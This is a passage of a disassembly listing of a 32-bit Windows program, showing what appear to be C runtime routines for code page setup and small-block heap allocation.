mov ds:dword_40723C, 1
jmp ds:dword_405070
; ---------------------------------------------------------------------------
loc_403B50: ; CODE XREF: sub_403B30+E�j
cmp eax, 0FFFFFFFDh
jnz short loc_403B65
mov ds:dword_40723C, 1
jmp ds:dword_405074
; ---------------------------------------------------------------------------
loc_403B65: ; CODE XREF: sub_403B30+23�j
cmp eax, 0FFFFFFFCh
jnz short locret_403B79
mov eax, ds:dword_407264
mov ds:dword_40723C, 1
locret_403B79: ; CODE XREF: sub_403B30+38�j
retn
sub_403B30 endp
; =============== S U B R O U T I N E =======================================
sub_403B7A proc near ; CODE XREF: sub_403997+118�p
; sub_403997+152�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
sub eax, 3A4h
jz short loc_403BA7
sub eax, 4
jz short loc_403BA1
sub eax, 0Dh
jz short loc_403B9B
dec eax
jz short loc_403B95
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_403B95: ; CODE XREF: sub_403B7A+16�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_403B9B: ; CODE XREF: sub_403B7A+13�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_403BA1: ; CODE XREF: sub_403B7A+E�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_403BA7: ; CODE XREF: sub_403B7A+9�j
mov eax, 411h
retn
sub_403B7A endp
; =============== S U B R O U T I N E =======================================
sub_403BAD proc near ; CODE XREF: sub_403997:loc_403B1A�p
push edi
push 40h
pop ecx
xor eax, eax
mov edi, offset byte_4073C0
rep stosd
stosb
xor eax, eax
mov edi, offset dword_4072A0
mov ds:dword_407290, eax
mov ds:dword_4072AC, eax
mov ds:dword_4074C4, eax
stosd
stosd
stosd
pop edi
retn
sub_403BAD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403BD6 proc near ; CODE XREF: sub_403997:loc_403B1F�p
var_514 = byte ptr -514h
var_314 = byte ptr -314h
var_214 = byte ptr -214h
var_114 = byte ptr -114h
var_14 = byte ptr -14h
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
push ebp
mov ebp, esp
sub esp, 514h
lea eax, [ebp+var_14]
push esi
push eax
push ds:dword_407290
call ds:dword_405078 ; GetCPInfo
cmp eax, 1
jnz loc_403D0F
xor eax, eax
mov esi, 100h
loc_403C00: ; CODE XREF: sub_403BD6+34�j
mov [ebp+eax+var_114], al
inc eax
cmp eax, esi
jb short loc_403C00
mov al, [ebp+var_E]
mov [ebp+var_114], 20h
test al, al
jz short loc_403C51
push ebx
push edi
lea edx, [ebp+var_D]
loc_403C1F: ; CODE XREF: sub_403BD6+77�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_403C46
sub ecx, eax
lea edi, [ebp+eax+var_114]
inc ecx
mov eax, 20202020h
mov ebx, ecx
shr ecx, 2
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_403C46: ; CODE XREF: sub_403BD6+51�j
inc edx
inc edx
mov al, [edx-1]
test al, al
jnz short loc_403C1F
pop edi
pop ebx
loc_403C51: ; CODE XREF: sub_403BD6+42�j
push 0
lea eax, [ebp+var_514]
push ds:dword_4074C4
push ds:dword_407290
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 1
call sub_40380C
push 0
lea eax, [ebp+var_214]
push ds:dword_407290
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push esi
push ds:dword_4074C4
call sub_4047EE
push 0
lea eax, [ebp+var_314]
push ds:dword_407290
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 200h
push ds:dword_4074C4
call sub_4047EE
add esp, 5Ch
xor eax, eax
lea ecx, [ebp+var_514]
loc_403CCC: ; CODE XREF: sub_403BD6+135�j
mov dx, [ecx]
test dl, 1
jz short loc_403CEA
or ds:byte_4073C1[eax], 10h
mov dl, [ebp+eax+var_214]
loc_403CE2: ; CODE XREF: sub_403BD6+127�j
mov ds:byte_4072C0[eax], dl
jmp short loc_403D06
; ---------------------------------------------------------------------------
loc_403CEA: ; CODE XREF: sub_403BD6+FC�j
test dl, 2
jz short loc_403CFF
or ds:byte_4073C1[eax], 20h
mov dl, [ebp+eax+var_314]
jmp short loc_403CE2
; ---------------------------------------------------------------------------
loc_403CFF: ; CODE XREF: sub_403BD6+117�j
and ds:byte_4072C0[eax], 0
loc_403D06: ; CODE XREF: sub_403BD6+112�j
inc eax
inc ecx
inc ecx
cmp eax, esi
jb short loc_403CCC
jmp short loc_403D58
; ---------------------------------------------------------------------------
loc_403D0F: ; CODE XREF: sub_403BD6+1D�j
xor eax, eax
mov esi, 100h
loc_403D16: ; CODE XREF: sub_403BD6+180�j
cmp eax, 41h
jb short loc_403D34
cmp eax, 5Ah
ja short loc_403D34
or ds:byte_4073C1[eax], 10h
mov cl, al
add cl, 20h
loc_403D2C: ; CODE XREF: sub_403BD6+174�j
mov ds:byte_4072C0[eax], cl
jmp short loc_403D53
; ---------------------------------------------------------------------------
loc_403D34: ; CODE XREF: sub_403BD6+143�j
; sub_403BD6+148�j
cmp eax, 61h
jb short loc_403D4C
cmp eax, 7Ah
ja short loc_403D4C
or ds:byte_4073C1[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_403D2C
; ---------------------------------------------------------------------------
loc_403D4C: ; CODE XREF: sub_403BD6+161�j
; sub_403BD6+166�j
and ds:byte_4072C0[eax], 0
loc_403D53: ; CODE XREF: sub_403BD6+15C�j
inc eax
cmp eax, esi
jb short loc_403D16
loc_403D58: ; CODE XREF: sub_403BD6+137�j
pop esi
leave
retn
sub_403BD6 endp
; =============== S U B R O U T I N E =======================================
sub_403D5B proc near ; CODE XREF: sub_402E37+9�p
; sub_402E8F+D�p ...
cmp ds:dword_4075E8, 0
jnz short locret_403D76
push 0FFFFFFFDh
call sub_403997
pop ecx
mov ds:dword_4075E8, 1
locret_403D76: ; CODE XREF: sub_403D5B+7�j
retn
sub_403D5B endp
; =============== S U B R O U T I N E =======================================
sub_403D77 proc near ; CODE XREF: sub_402E8F+9D�p
; sub_403195+BF�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_403DA4
push esi
call sub_403E58
pop ecx
test eax, eax
push esi
jz short loc_403D96
push eax
call sub_403E83
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_403D96: ; CODE XREF: sub_403D77+13�j
push 0
push ds:dword_4074C8
call ds:dword_405090 ; RtlFreeHeap
loc_403DA4: ; CODE XREF: sub_403D77+7�j
pop esi
retn
sub_403D77 endp
; =============== S U B R O U T I N E =======================================
sub_403DA6 proc near ; CODE XREF: sub_402E8F+3A�p
; sub_402E8F+6F�p ...
arg_0 = dword ptr 4
push ds:dword_407270
push [esp+4+arg_0]
call sub_403DB8
pop ecx
pop ecx
retn
sub_403DA6 endp
; =============== S U B R O U T I N E =======================================
sub_403DB8 proc near ; CODE XREF: sub_403DA6+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_403DE1
loc_403DBF: ; CODE XREF: sub_403DB8+27�j
push [esp+arg_0]
call sub_403DE4
test eax, eax
pop ecx
jnz short locret_403DE3
cmp [esp+arg_4], eax
jz short locret_403DE3
push [esp+arg_0]
call sub_404A3D
test eax, eax
pop ecx
jnz short loc_403DBF
loc_403DE1: ; CODE XREF: sub_403DB8+5�j
xor eax, eax
locret_403DE3: ; CODE XREF: sub_403DB8+13�j
; sub_403DB8+19�j
retn
sub_403DB8 endp
; =============== S U B R O U T I N E =======================================
sub_403DE4 proc near ; CODE XREF: sub_403DB8+B�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
cmp esi, ds:dword_4070B8
ja short loc_403DFC
push esi
call sub_4041AE
test eax, eax
pop ecx
jnz short loc_403E18
loc_403DFC: ; CODE XREF: sub_403DE4+B�j
test esi, esi
jnz short loc_403E03
push 1
pop esi
loc_403E03: ; CODE XREF: sub_403DE4+1A�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push 0
push ds:dword_4074C8
call ds:dword_40506C ; RtlAllocateHeap
loc_403E18: ; CODE XREF: sub_403DE4+16�j
pop esi
retn
sub_403DE4 endp
; =============== S U B R O U T I N E =======================================
sub_403E1A proc near ; CODE XREF: sub_403472+20�p
push 140h
push 0
push ds:dword_4074C8
call ds:dword_40506C ; RtlAllocateHeap
test eax, eax
mov ds:dword_40728C, eax
jnz short loc_403E37
retn
; ---------------------------------------------------------------------------
loc_403E37: ; CODE XREF: sub_403E1A+1A�j
and ds:dword_407284, 0
and ds:dword_407288, 0
push 1
mov ds:dword_407280, eax
mov ds:dword_407278, 10h
pop eax
retn
sub_403E1A endp
; =============== S U B R O U T I N E =======================================
sub_403E58 proc near ; CODE XREF: sub_403D77+A�p
arg_0 = dword ptr 4
mov eax, ds:dword_407288
lea ecx, [eax+eax*4]
mov eax, ds:dword_40728C
lea ecx, [eax+ecx*4]
loc_403E68: ; CODE XREF: sub_403E58+26�j
cmp eax, ecx
jnb short loc_403E80
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_403E82
add eax, 14h
jmp short loc_403E68
; ---------------------------------------------------------------------------
loc_403E80: ; CODE XREF: sub_403E58+12�j
xor eax, eax
locret_403E82: ; CODE XREF: sub_403E58+21�j
retn
sub_403E58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403E83 proc near ; CODE XREF: sub_403D77+16�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_0]
push ebx
push esi
mov eax, [ecx+10h]
mov esi, edx
sub esi, [ecx+0Ch]
mov ebx, [edx-4]
add edx, 0FFFFFFFCh
push edi
shr esi, 0Fh
mov ecx, esi
mov edi, [edx-4]
imul ecx, 204h
dec ebx
mov [ebp+var_4], edi
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ebx
mov [ebp+var_10], ecx
mov ecx, [ebx+edx]
test cl, 1
mov [ebp+var_8], ecx
jnz short loc_403F49
sar ecx, 4
push 3Fh
dec ecx
pop edi
mov [ebp+arg_4], ecx
cmp ecx, edi
jbe short loc_403EDB
mov [ebp+arg_4], edi
loc_403EDB: ; CODE XREF: sub_403E83+53�j
mov ecx, [ebx+edx+4]
cmp ecx, [ebx+edx+8]
jnz short loc_403F2D
mov ecx, [ebp+arg_4]
cmp ecx, 20h
jnb short loc_403F09
mov edi, 80000000h
shr edi, cl
lea ecx, [ecx+eax+4]
not edi
and [eax+esi*4+44h], edi
dec byte ptr [ecx]
jnz short loc_403F2D
mov ecx, [ebp+arg_0]
and [ecx], edi
jmp short loc_403F2D
; ---------------------------------------------------------------------------
loc_403F09: ; CODE XREF: sub_403E83+68�j
add ecx, 0FFFFFFE0h
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_4]
lea ecx, [ecx+eax+4]
not edi
and [eax+esi*4+0C4h], edi
dec byte ptr [ecx]
jnz short loc_403F2D
mov ecx, [ebp+arg_0]
and [ecx+4], edi
loc_403F2D: ; CODE XREF: sub_403E83+60�j
; sub_403E83+7D�j ...
mov ecx, [ebx+edx+8]
mov edi, [ebx+edx+4]
mov [ecx+4], edi
mov ecx, [ebx+edx+4]
mov edi, [ebx+edx+8]
add ebx, [ebp+var_8]
mov [ecx+8], edi
mov [ebp+var_C], ebx
loc_403F49: ; CODE XREF: sub_403E83+45�j
mov edi, ebx
sar edi, 4
dec edi
cmp edi, 3Fh
jbe short loc_403F57
push 3Fh
pop edi
loc_403F57: ; CODE XREF: sub_403E83+CF�j
mov ecx, [ebp+var_4]
and ecx, 1
mov [ebp+var_14], ecx
jnz loc_404006
sub edx, [ebp+var_4]
mov ecx, [ebp+var_4]
sar ecx, 4
push 3Fh
mov [ebp+var_8], edx
dec ecx
pop edx
cmp ecx, edx
mov [ebp+arg_4], ecx
jbe short loc_403F82
mov [ebp+arg_4], edx
mov ecx, edx
loc_403F82: ; CODE XREF: sub_403E83+F8�j
add ebx, [ebp+var_4]
mov edi, ebx
mov [ebp+var_C], ebx
sar edi, 4
dec edi
cmp edi, edx
jbe short loc_403F94
mov edi, edx
loc_403F94: ; CODE XREF: sub_403E83+10D�j
cmp ecx, edi
jz short loc_404003
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
cmp edx, [ecx+8]
jnz short loc_403FEB
mov ecx, [ebp+arg_4]
cmp ecx, 20h
jnb short loc_403FC7
mov edx, 80000000h
shr edx, cl
lea ecx, [ecx+eax+4]
not edx
and [eax+esi*4+44h], edx
dec byte ptr [ecx]
jnz short loc_403FEB
mov ecx, [ebp+arg_0]
and [ecx], edx
jmp short loc_403FEB
; ---------------------------------------------------------------------------
loc_403FC7: ; CODE XREF: sub_403E83+126�j
add ecx, 0FFFFFFE0h
mov edx, 80000000h
shr edx, cl
mov ecx, [ebp+arg_4]
lea ecx, [ecx+eax+4]
not edx
and [eax+esi*4+0C4h], edx
dec byte ptr [ecx]
jnz short loc_403FEB
mov ecx, [ebp+arg_0]
and [ecx+4], edx
loc_403FEB: ; CODE XREF: sub_403E83+11E�j
; sub_403E83+13B�j ...
mov ecx, [ebp+var_8]
mov edx, [ecx+8]
mov ecx, [ecx+4]
mov [edx+4], ecx
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
mov ecx, [ecx+8]
mov [edx+8], ecx
loc_404003: ; CODE XREF: sub_403E83+113�j
mov edx, [ebp+var_8]
loc_404006: ; CODE XREF: sub_403E83+DD�j
cmp [ebp+var_14], 0
jnz short loc_404015
cmp [ebp+arg_4], edi
jz loc_40409E
loc_404015: ; CODE XREF: sub_403E83+187�j
mov ecx, [ebp+var_10]
lea ecx, [ecx+edi*8]
mov ecx, [ecx+4]
mov [edx+4], ecx
mov ecx, [ebp+var_10]
lea ecx, [ecx+edi*8]
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_40409E
mov cl, [edi+eax+4]
cmp edi, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [edi+eax+4], cl
jnb short loc_404072
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_404061
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_404061: ; CODE XREF: sub_403E83+1CE�j
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
lea eax, [eax+esi*4+44h]
or [eax], ebx
jmp short loc_40409B
; ---------------------------------------------------------------------------
loc_404072: ; CODE XREF: sub_403E83+1C8�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_404088
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_404088: ; CODE XREF: sub_403E83+1F3�j
lea ecx, [edi-20h]
mov edi, 80000000h
shr edi, cl
lea eax, [eax+esi*4+0C4h]
or [eax], edi
loc_40409B: ; CODE XREF: sub_403E83+1ED�j
mov ebx, [ebp+var_C]
loc_40409E: ; CODE XREF: sub_403E83+18C�j
; sub_403E83+1B6�j
mov eax, [ebp+var_10]
mov [edx], ebx
mov [ebx+edx-4], ebx
dec dword ptr [eax]
jnz loc_4041A9
mov eax, ds:dword_407284
test eax, eax
jz loc_40419B
mov ecx, ds:dword_40727C
mov edi, ds:dword_405094
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push 4000h
push ebx
push ecx
call edi ; VirtualFree
mov ecx, ds:dword_40727C
mov eax, ds:dword_407284
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, ds:dword_407284
mov ecx, ds:dword_40727C
mov eax, [eax+10h]
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, ds:dword_407284
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, ds:dword_407284
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_404129
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, ds:dword_407284
loc_404129: ; CODE XREF: sub_403E83+29B�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_40419B
push ebx
push 0
push dword ptr [eax+0Ch]
call edi ; VirtualFree
mov eax, ds:dword_407284
push dword ptr [eax+10h]
push 0
push ds:dword_4074C8
call ds:dword_405090 ; RtlFreeHeap
mov eax, ds:dword_407288
mov edx, ds:dword_40728C
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, ds:dword_407284
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_404A60
mov eax, [ebp+arg_0]
add esp, 0Ch
dec ds:dword_407288
cmp eax, ds:dword_407284
jbe short loc_40418D
sub eax, 14h
loc_40418D: ; CODE XREF: sub_403E83+305�j
mov ecx, ds:dword_40728C
mov ds:dword_407280, ecx
jmp short loc_40419E
; ---------------------------------------------------------------------------
loc_40419B: ; CODE XREF: sub_403E83+233�j
; sub_403E83+2AA�j
mov eax, [ebp+arg_0]
loc_40419E: ; CODE XREF: sub_403E83+316�j
mov ds:dword_407284, eax
mov ds:dword_40727C, esi
loc_4041A9: ; CODE XREF: sub_403E83+226�j
pop edi
pop esi
pop ebx
leave
retn
sub_403E83 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4041AE proc near ; CODE XREF: sub_403DE4+E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, ds:dword_407288
mov edx, ds:dword_40728C
push ebx
push esi
lea eax, [eax+eax*4]
push edi
lea edi, [edx+eax*4]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
lea ecx, [eax+17h]
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
dec ecx
cmp ecx, 20h
jge short loc_4041EE
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
mov [ebp+var_C], esi
jmp short loc_4041FE
; ---------------------------------------------------------------------------
loc_4041EE: ; CODE XREF: sub_4041AE+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_C], esi
mov [ebp+var_8], eax
loc_4041FE: ; CODE XREF: sub_4041AE+3E�j
mov eax, ds:dword_407280
mov ebx, eax
cmp ebx, edi
mov [ebp+arg_0], ebx
jnb short loc_404225
loc_40420C: ; CODE XREF: sub_4041AE+75�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_404225
add ebx, 14h
cmp ebx, [ebp+var_4]
mov [ebp+arg_0], ebx
jb short loc_40420C
loc_404225: ; CODE XREF: sub_4041AE+5C�j
; sub_4041AE+6A�j
cmp ebx, [ebp+var_4]
jnz short loc_4042A3
mov ebx, edx
loc_40422C: ; CODE XREF: sub_4041AE+96�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_404248
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_404246
add ebx, 14h
jmp short loc_40422C
; ---------------------------------------------------------------------------
loc_404246: ; CODE XREF: sub_4041AE+91�j
cmp ebx, eax
loc_404248: ; CODE XREF: sub_4041AE+83�j
jnz short loc_4042A3
loc_40424A: ; CODE XREF: sub_4041AE+AD�j
cmp ebx, [ebp+var_4]
jnb short loc_404260
cmp dword ptr [ebx+8], 0
jnz short loc_40425D
add ebx, 14h
mov [ebp+arg_0], ebx
jmp short loc_40424A
; ---------------------------------------------------------------------------
loc_40425D: ; CODE XREF: sub_4041AE+A5�j
cmp ebx, [ebp+var_4]
loc_404260: ; CODE XREF: sub_4041AE+9F�j
jnz short loc_404288
mov ebx, edx
loc_404264: ; CODE XREF: sub_4041AE+C6�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_404278
cmp dword ptr [ebx+8], 0
jnz short loc_404276
add ebx, 14h
jmp short loc_404264
; ---------------------------------------------------------------------------
loc_404276: ; CODE XREF: sub_4041AE+C1�j
cmp ebx, eax
loc_404278: ; CODE XREF: sub_4041AE+BB�j
jnz short loc_404288
call sub_4044B7
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_40429C
loc_404288: ; CODE XREF: sub_4041AE:loc_404260�j
; sub_4041AE:loc_404278�j
push ebx
call sub_404568
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_4042A3
loc_40429C: ; CODE XREF: sub_4041AE+D8�j
xor eax, eax
jmp loc_4044B2
; ---------------------------------------------------------------------------
loc_4042A3: ; CODE XREF: sub_4041AE+7A�j
; sub_4041AE:loc_404248�j ...
mov ds:dword_407280, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_4042CA
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_404301
loc_4042CA: ; CODE XREF: sub_4041AE+106�j
mov edx, [eax+0C4h]
mov esi, [eax+44h]
and edx, [ebp+var_8]
and esi, [ebp+var_C]
and [ebp+var_4], 0
lea ecx, [eax+44h]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_4042FE
loc_4042E7: ; CODE XREF: sub_4041AE+14E�j
mov edx, [ecx+84h]
inc [ebp+var_4]
and edx, [ebp+var_8]
add ecx, 4
mov edi, esi
and edi, [ecx]
or edx, edi
jz short loc_4042E7
loc_4042FE: ; CODE XREF: sub_4041AE+137�j
mov edx, [ebp+var_4]
loc_404301: ; CODE XREF: sub_4041AE+11A�j
mov ecx, edx
xor edi, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
and ecx, esi
jnz short loc_40432A
mov ecx, [eax+edx*4+0C4h]
push 20h
and ecx, [ebp+var_8]
pop edi
loc_40432A: ; CODE XREF: sub_4041AE+16D�j
; sub_4041AE+183�j
test ecx, ecx
jl short loc_404333
shl ecx, 1
inc edi
jmp short loc_40432A
; ---------------------------------------------------------------------------
loc_404333: ; CODE XREF: sub_4041AE+17E�j
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
mov [ebp+var_8], ecx
sar esi, 4
dec esi
cmp esi, 3Fh
jle short loc_404350
push 3Fh
pop esi
loc_404350: ; CODE XREF: sub_4041AE+19D�j
cmp esi, edi
jz loc_404465
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_4043C1
cmp edi, 20h
jge short loc_404390
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_4043BE
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx], ecx
jmp short loc_4043C1
; ---------------------------------------------------------------------------
loc_404390: ; CODE XREF: sub_4041AE+1B5�j
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
lea ecx, [eax+ecx*4+0C4h]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_4043BE
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_4043C1
; ---------------------------------------------------------------------------
loc_4043BE: ; CODE XREF: sub_4041AE+1D6�j
; sub_4041AE+203�j
mov ebx, [ebp+arg_0]
loc_4043C1: ; CODE XREF: sub_4041AE+1B0�j
; sub_4041AE+1E0�j ...
mov ecx, [edx+8]
mov edi, [edx+4]
cmp [ebp+var_8], 0
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_404471
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [edx+4], edi
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_404462
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_0+3], cl
jge short loc_404433
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_404421
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_404421: ; CODE XREF: sub_4041AE+266�j
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_404462
; ---------------------------------------------------------------------------
loc_404433: ; CODE XREF: sub_4041AE+25A�j
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_40444C
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_40444C: ; CODE XREF: sub_4041AE+28F�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_404462: ; CODE XREF: sub_4041AE+24E�j
; sub_4041AE+283�j
mov ecx, [ebp+var_8]
loc_404465: ; CODE XREF: sub_4041AE+1A4�j
test ecx, ecx
jz short loc_404474
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_404474
; ---------------------------------------------------------------------------
loc_404471: ; CODE XREF: sub_4041AE+229�j
mov ecx, [ebp+var_8]
loc_404474: ; CODE XREF: sub_4041AE+2B9�j
; sub_4041AE+2C1�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_4044AA
cmp ebx, ds:dword_407284
jnz short loc_4044AA
mov ecx, [ebp+var_4]
cmp ecx, ds:dword_40727C
jnz short loc_4044AA
and ds:dword_407284, 0
loc_4044AA: ; CODE XREF: sub_4041AE+2E0�j
; sub_4041AE+2E8�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_4044B2: ; CODE XREF: sub_4041AE+F0�j
pop edi
pop esi
pop ebx
leave
retn
sub_4041AE endp
; =============== S U B R O U T I N E =======================================
sub_4044B7 proc near ; CODE XREF: sub_4041AE+CC�p
mov eax, ds:dword_407288
mov ecx, ds:dword_407278
push esi
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_4044FA
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push ds:dword_40728C
push edi
push ds:dword_4074C8
call ds:dword_405064 ; RtlReAllocateHeap
cmp eax, edi
jz short loc_40454A
add ds:dword_407278, 10h
mov ds:dword_40728C, eax
mov eax, ds:dword_407288
loc_4044FA: ; CODE XREF: sub_4044B7+11�j
mov ecx, ds:dword_40728C
push 41C4h
push 8
lea eax, [eax+eax*4]
push ds:dword_4074C8
lea esi, [ecx+eax*4]
call ds:dword_40506C ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jz short loc_40454A
push 4
push 2000h
push 100000h
push edi
call ds:dword_405068 ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_40454E
push dword ptr [esi+10h]
push edi
push ds:dword_4074C8
call ds:dword_405090 ; RtlFreeHeap
loc_40454A: ; CODE XREF: sub_4044B7+30�j
; sub_4044B7+67�j
xor eax, eax
jmp short loc_404565
; ---------------------------------------------------------------------------
loc_40454E: ; CODE XREF: sub_4044B7+81�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc ds:dword_407288
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_404565: ; CODE XREF: sub_4044B7+95�j
pop edi
pop esi
retn
sub_4044B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404568 proc near ; CODE XREF: sub_4041AE+DB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, [ecx+10h]
mov eax, [ecx+8]
xor ebx, ebx
loc_40457A: ; CODE XREF: sub_404568+19�j
test eax, eax
jl short loc_404583
shl eax, 1
inc ebx
jmp short loc_40457A
; ---------------------------------------------------------------------------
loc_404583: ; CODE XREF: sub_404568+14�j
mov eax, ebx
push 3Fh
imul eax, 204h
pop edx
lea eax, [eax+esi+144h]
mov [ebp+var_4], eax
loc_404598: ; CODE XREF: sub_404568+3A�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_404598
mov edi, ebx
push 4
shl edi, 0Fh
add edi, [ecx+0Ch]
push 1000h
push 8000h
push edi
call ds:dword_405068 ; VirtualAlloc
test eax, eax
jnz short loc_4045CB
or eax, 0FFFFFFFFh
jmp loc_40465E
; ---------------------------------------------------------------------------
loc_4045CB: ; CODE XREF: sub_404568+59�j
lea edx, [edi+7000h]
cmp edi, edx
